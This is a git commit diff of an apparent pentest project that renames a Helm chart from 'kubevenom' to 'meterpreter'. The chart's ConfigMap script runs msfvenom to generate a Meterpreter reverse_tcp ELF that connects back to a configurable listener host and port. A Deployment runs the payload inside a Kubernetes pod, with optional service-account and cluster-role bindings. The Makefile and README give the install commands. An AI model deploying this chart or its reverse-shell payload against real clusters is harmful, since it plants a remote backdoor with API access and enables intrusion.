naming - go meterpreter

2021-11-01 09:17:21 +02:00
parent 75e4d7dab7
commit 8d7d25ed1b
13 changed files with 63 additions and 63 deletions
@@ -1,3 +1,3 @@
 metasploit/charts
 metasploit.yaml
-kubevenom.yaml
+meterpreter.yaml
@@ -5,16 +5,16 @@
 .SECONDEXPANSION:

 lint-charts: ##@Lint Lint Helm Chart
-	helm lint kubevenom    
+	helm lint meterpreter    

-generate-deployment:	##@Generate Generate K8S installation
-	helm template kubevenom kubevenom --set lport="4444" --set lhost="1.1.1.1" > kubevenom.yaml   
+generate-deployment:	##@Generate Generate YAML based deployment
+	helm template meterpreter meterpreter --set lport="4444" --set lhost="1.1.1.1" > meterpreter.yaml   

-install-kubevenom: ##@kubevenom Install kubevenom chart
-	helm upgrade --create-namespace -i -n metasploit kubevenom ./kubevenom
+install-meterpreter: ##@meterpreter Install meterpreter chart
+	helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter

-delete-kubevenom: ##@kubevenom Delete kubevenom chart    
-	helm -n metasploit delete kubevenom    
+delete-meterpreter: ##@meterpreter Delete meterpreter chart    
+	helm -n metasploit delete meterpreter    


 create-kind-cluster:  ##@Test create KIND cluster
@@ -3,7 +3,7 @@

 Running metasploit framework against Kubernetes enables pentesters to security test cluster components such as the API Server, as well as internal application components or micro-services.

-The installation chart (kubevenom) also offers to install & run a metasploit payload, that connects back to metasploit console.
+The installation chart (meterpreter) also offers to install & run a metasploit payload, that connects back to metasploit console.
 The payload can be deployed with different priviliges and permissions with respect to Kubernetes node hosting metasploit payload, as well as Kubernetes API server itself - see 'priviliges' section under values.yaml

 ```yaml
@@ -37,10 +37,10 @@ priviliges:
 2. Make sure you have an available Kubernetes cluster to deploy metasploit. You can install a local Kubernetes cluster using [KIND](https://kind.sigs.k8s.io/docs/user/quick-start/#installation)
    > You can create local KIND cluster by running  `make create-kind-cluster`

-3. Install kubevenom helm chart by running:
+3. Install meterpreter helm chart by running:

 ```sh
 export MSF_PORT="<routeable port from inside cluster>"
 export MSF_IPADDRESS="<routeable ip from inside cluster>"
-helm upgrade --create-namespace -i -n metasploit kubevenom ./kubevenom --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
+helm upgrade --create-namespace -i -n metasploit meterpreter ./meterpreter --set lport=$MSF_PORT --set lhost=$MSF_IPADDRESS
 ```
@@ -1 +0,0 @@
-Make sure kubevenom connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}
@@ -1,15 +0,0 @@
-apiVersion: v1
-kind: ConfigMap
-metadata:
-  name: {{ include "kubevenom.fullname" . }}
-  labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
-data:
-  kubevenom.sh: |-
-    #!/bin/bash -x
-
-    env
-    pwd
-    ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > /kubevenom/kubevenom
-    chmod +x /kubevenom/kubevenom
-    ls -la /kubevenom/kubevenom
@@ -1,11 +1,11 @@
 apiVersion: v2
-name: kubevenom
+name: meterpreter
 description: A Helm chart for deploying metasploit payload into Kubernetes
 type: application
 version: 0.1.0
 keywords:
  - metasploit
-  - meterperter
+  - meterpreter
  - security
  - pentest
  - penetration testing
@@ -0,0 +1 @@
+Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}
@@ -2,7 +2,7 @@
 {{/*
 Expand the name of the chart.
 */}}
-{{- define "kubevenom.name" -}}
+{{- define "meterpreter.name" -}}
 {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}}
 {{- end -}}

@@ -11,7 +11,7 @@ Create a default fully qualified app name.
 We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec).
 If release name contains chart name it will be used as a full name.
 */}}
-{{- define "kubevenom.fullname" -}}
+{{- define "meterpreter.fullname" -}}
 {{- if .Values.fullnameOverride -}}
 {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}}
 {{- else -}}
@@ -27,16 +27,16 @@ If release name contains chart name it will be used as a full name.
 {{/*
 Create chart name and version as used by the chart label.
 */}}
-{{- define "kubevenom.chart" -}}
+{{- define "meterpreter.chart" -}}
 {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}}
 {{- end -}}

 {{/*
 Common labels
 */}}
-{{- define "kubevenom.labels" -}}
-helm.sh/chart: {{ include "kubevenom.chart" . }}
-{{ include "kubevenom.selectorLabels" . }}
+{{- define "meterpreter.labels" -}}
+helm.sh/chart: {{ include "meterpreter.chart" . }}
+{{ include "meterpreter.selectorLabels" . }}
 {{- if .Chart.AppVersion }}
 app.kubernetes.io/version: {{ .Chart.AppVersion | quote }}
 {{- end }}
@@ -46,7 +46,7 @@ app.kubernetes.io/managed-by: {{ .Release.Service }}
 {{/*
 Selector labels
 */}}
-{{- define "kubevenom.selectorLabels" -}}
-app.kubernetes.io/name: {{ include "kubevenom.name" . }}
+{{- define "meterpreter.selectorLabels" -}}
+app.kubernetes.io/name: {{ include "meterpreter.name" . }}
 app.kubernetes.io/instance: {{ .Release.Name }}
 {{- end -}}
@@ -0,0 +1,15 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: {{ include "meterpreter.fullname" . }}
+  labels:
+    {{- include "meterpreter.labels" . | nindent 4 }}
+data:
+  meterpreter.sh: |-
+    #!/bin/bash -x
+
+    env
+    pwd
+    ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > /meterpreter/meterpreter
+    chmod +x /meterpreter/meterpreter
+    ls -la /meterpreter/meterpreter
@@ -1,25 +1,25 @@
 apiVersion: apps/v1
 kind: Deployment
 metadata:
-  name: {{ include "kubevenom.fullname" . }}
+  name: {{ include "meterpreter.fullname" . }}
  labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
+    {{- include "meterpreter.labels" . | nindent 4 }}
 spec:
  replicas: 1
  selector:
    matchLabels:
-      {{- include "kubevenom.selectorLabels" . | nindent 6 }}
+      {{- include "meterpreter.selectorLabels" . | nindent 6 }}
  template:
    metadata:
      labels:
-        {{- include "kubevenom.selectorLabels" . | nindent 8 }}
+        {{- include "meterpreter.selectorLabels" . | nindent 8 }}
    spec:
    {{- with .Values.imagePullSecrets }}
      imagePullSecrets:
        {{- toYaml . | nindent 8 }}
    {{- end }}
      {{- if .Values.priviliges.useServiceAccount }}
-      serviceAccountName: {{ include "kubevenom.fullname" . }}
+      serviceAccountName: {{ include "meterpreter.fullname" . }}
      {{ else }}
      automountServiceAccountToken: false
      {{ end }}
@@ -29,24 +29,24 @@ spec:
        - name: msfvenome
          image: "{{ .Values.image.repository}}:{{ .Values.image.tag }}"
          imagePullPolicy: {{ .Values.image.pullPolicy }}        
-          command: ["/bin/bash", "-c", "/tmp/kubevenom.sh"]
+          command: ["/bin/bash", "-c", "/tmp/meterpreter.sh"]
          env:
            - name: LHOST
              value: "{{ required "Please provide value to 'lhost' - The IP Address the payload will connect to" .Values.lhost }}"
            - name: LPORT
              value: "{{ required "Please provide value to 'lport' - The Port the payload will connect to" .Values.lport }}"
          volumeMounts:
-            - name: kubevenom
-              mountPath: /kubevenom
+            - name: meterpreter
+              mountPath: /meterpreter
            - name: msfvenome
-              mountPath: /tmp/kubevenom.sh
-              subPath: kubevenom.sh
+              mountPath: /tmp/meterpreter.sh
+              subPath: meterpreter.sh
              
      containers:
        - name: {{ .Chart.Name }}
          image: gcr.io/google_containers/pause-amd64:3.0
          imagePullPolicy: {{ .Values.image.pullPolicy }}        
-          command: ["/kubevenom/kubevenom"]
+          command: ["/meterpreter/meterpreter"]
          tty: true
          stdin: true
          securityContext:
@@ -55,19 +55,19 @@ spec:
          resources:
            {{- toYaml .Values.resources | nindent 12 }}
          volumeMounts:
-            - name: kubevenom
-              mountPath: /kubevenom
+            - name: meterpreter
+              mountPath: /meterpreter
 
      restartPolicy: Always
      volumes:
-        - name: kubevenom
+        - name: meterpreter
          emptyDir: {}
        - name: msfvenome
          configMap:
-            name: {{ include "kubevenom.fullname" . }}
+            name: {{ include "meterpreter.fullname" . }}
            items:
-            - key: kubevenom.sh
-              path: kubevenom.sh
+            - key: meterpreter.sh
+              path: meterpreter.sh
            defaultMode: 0777


@@ -2,25 +2,25 @@
 apiVersion: v1
 kind: ServiceAccount
 metadata:
-  name: {{ include "kubevenom.fullname" . }}
+  name: {{ include "meterpreter.fullname" . }}
  labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
+    {{- include "meterpreter.labels" . | nindent 4 }}

 ---
 {{- if ne .Values.priviliges.bindClusterRole "" -}}
 apiVersion: rbac.authorization.k8s.io/v1
 kind: RoleBinding
 metadata:
-  name: {{ include "kubevenom.fullname" . }}
+  name: {{ include "meterpreter.fullname" . }}
  labels:
-    {{- include "kubevenom.labels" . | nindent 4 }}
+    {{- include "meterpreter.labels" . | nindent 4 }}
 roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: {{ .Values.priviliges.bindClusterRole }}
 subjects:
  - kind: ServiceAccount
-    name: {{ include "kubevenom.fullname" . }}
+    name: {{ include "meterpreter.fullname" . }}
    namespace: {{ .Release.Namespace }}
 {{- end -}}
 {{- end -}}
@@ -1,8 +1,8 @@
-# Default values for kubevenom.
+# Default values for meterpreter.

-#"<The IP Address the payload will connect to>"
+#The IP Address the payload will connect to
 lhost: 
-#"<The Port kubevenom meterperter will connect to>"
+#The Port meterpreter will connect to
 lport: 

 image:
@@ -14,7 +14,7 @@ imagePullSecrets: []
 nameOverride: ""
 fullnameOverride: ""

-# Tune the priviliges your Kubernetes meterperter will run with 
+# Tune the priviliges your Kubernetes meterpreter will run with 
 priviliges:
  # Disable Kubernetes API Server Access - even to the discovery APIs
  useServiceAccount: true
				`@@ -1 +0,0 @@`
				`Make sure kubevenom connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}`
				`@@ -0,0 +1 @@`
				`Make sure meterpreter connected to your Metasploit Receive Handler running at {{ .Values.lhost}}:{{.Values.lport}}`